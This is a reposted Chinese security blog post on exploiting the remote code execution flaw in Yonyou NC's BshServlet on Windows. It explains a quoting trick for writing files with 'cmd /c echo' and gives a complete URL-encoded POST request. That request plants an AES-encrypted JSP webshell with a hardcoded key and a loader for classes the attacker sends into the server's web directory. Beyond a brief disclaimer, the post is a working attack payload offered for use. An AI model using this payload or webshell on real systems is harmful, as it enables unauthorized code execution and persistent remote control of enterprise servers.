用友NC BshServlet Echo Shell Tips 与 EXP on Windows

admin
admin
admin
102305
文章
87
评论
2021年11月6日08:27:56评论490 views字数 1685阅读5分37秒阅读模式

用友NC BshServlet Echo Shell Tips 与 EXP on Windows



△△△点击上方“蓝字”关注我们了解更多精彩




目录结构


0x00 前言/简介

0x01 写shell的小Tips

0x02 最重要的POST数据包

0x03 自动化利用EXP

0x04 总结


0x00 Preface [前言/简介]

多次遇到了NC6.5 bsh.servlet.BshServlet RCE漏洞需求,手动调试发现Shell写起来很费时间。

经过摸鱼N久的功夫,最终成功写入shell,如此便能够输出一个可用的Windows Echo Shell的EXP。




0x01 写shell的小Tips

写shell的过程中有转义问题,开始一直在硬刚。
在当我使用双引号引用内容时不需要转义,但是会导致数据被引号引起,无法解析。
exec(cmd /c echo "shell-code" > shell.jsp);
shell.jsp:  "shell-code"
最终换了一个小思路,把多余的引号闭合到代码之外
exec(cmd /c echo ">shell-code<" > shell.jsp);
shell.jsp内容: ">shell-code<





0x02 最重要的POST数据包

"bsh.script=exec%28%22cmd+%2Fc+echo+%5C%22%3E%3C%25%40page+import%3D%5C%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%5C%22%25%3E%3C%25%21class+U+extends+ClassLoader%7BU%28ClassLoader+c%29%7Bsuper%28c%29%3B%7Dpublic+Class+g%28byte+%5B%5Db%29%7Breturn+super.defineClass%28b%2C0%2Cb.length%29%3B%7D%7D%25%3E%3C%25if+%28request.getMethod%28%29.equals%28%5C%22POST%5C%22%29%29%7BString+k%3D%5C%22e45e329feb5d925b%5C%22%3Bsession.putValue%28%5C%22u%5C%22%2Ck%29%3BCipher+c%3DCipher.getInstance%28%5C%22AES%5C%22%29%3Bc.init%282%2Cnew+SecretKeySpec%28k.getBytes%28%29%2C%5C%22AES%5C%22%29%29%3Bnew+U%28this.getClass%28%29.getClassLoader%28%29%29.g%28c.doFinal%28new+sun.misc.BASE64Decoder%28%29.decodeBuffer%28request.getReader%28%29.readLine%28%29%29%29%29.newInstance%28%29.equals%28pageContext%29%3B%7D%25%3E%3C%5C%22+%3E+webapps%2Fnc_web%2Fshell.jsp%22%29%3B%0D%0A%0D%0A%0D%0A"





0x03 自动化利用EXP

用友NC BshServlet Echo Shell Tips 与 EXP on Windows


用友NC BshServlet Echo Shell Tips 与 EXP on Windows


用友NC BshServlet Echo Shell Tips 与 EXP on Windows


写入失败时,请查看报错情况。




0x04总结
由于某些原因,本次的EXP代码不直接提供。

有需要的读者可通过以下方式获取:
1、添加文末NOVASEC运营微信
2、NOVASEC公众号后台回复【共享】。

(PS:时间比较紧促,后台上传需要等待。)

被喷了,不开心。

END



如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!

用友NC BshServlet Echo Shell Tips 与 EXP on Windows

或添加NOVASEC-MOYU 以便于及时回复。

用友NC BshServlet Echo Shell Tips 与 EXP on Windows


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!



本文始发于微信公众号(NOVASEC):用友NC BshServlet Echo Shell Tips 与 EXP on Windows

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月6日08:27:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC BshServlet Echo Shell Tips 与 EXP on Windowshttps://cn-sec.com/archives/408347.html

发表评论

匿名网友 填写信息